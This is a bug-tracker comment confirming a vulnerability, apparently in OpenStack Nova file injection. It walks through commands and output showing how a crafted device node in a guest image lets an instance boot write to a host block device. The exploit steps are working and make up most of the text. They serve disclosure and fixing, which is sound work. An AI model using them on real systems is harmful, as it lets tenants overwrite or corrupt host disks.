Comment 3 for bug 1552042

I've confirmed that this is exploitable after talking to Matt, notes below using an up to date devstack env :

- libguestfs not installed on this Fedora 22 host.
- use_cow_images = False
- force_config_drive = False
- inject_partition = 0

- Customise an image to include a special block file pointing to a host device :

$ virt-customize -a cirros-0.3.4-x86_64-disk.img --run-command 'mknod host-device b 252 0'
[ 0.0] Examining the guest ...
[ 14.4] Setting a random seed
[ 14.4] Running: mknod host-device b 252 0
[ 14.5] Finishing off

- Write a marker to the host device before starting an instance :

root@host $ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 55G 0 disk
|-sda1 8:1 0 500M 0 part /boot
|-sda2 8:2 0 615M 0 part [SWAP]
`-sda3 8:3 0 53.9G 0 part /
vda 252:0 0 1G 0 disk
root@host $ echo 'Before starting an instance' > /dev/vda
root@host $ strings /dev/vda
Before starting an instance

- Upload the image and start an instance, injecting a file into the special block file previously created :

$ glance image-create --name cirros-fake-dev --file cirros-0.3.4-x86_64-disk.img --disk-format qcow2 --container-format bare
[..]
$ cat test-file
After running an instance
$ nova boot --image cirros-fake-dev --file /host-device=test-file --flavor 1 test-inject
[..]

- Confirm this is seen in the host :

root@host $ strings /dev/vda
After running an instance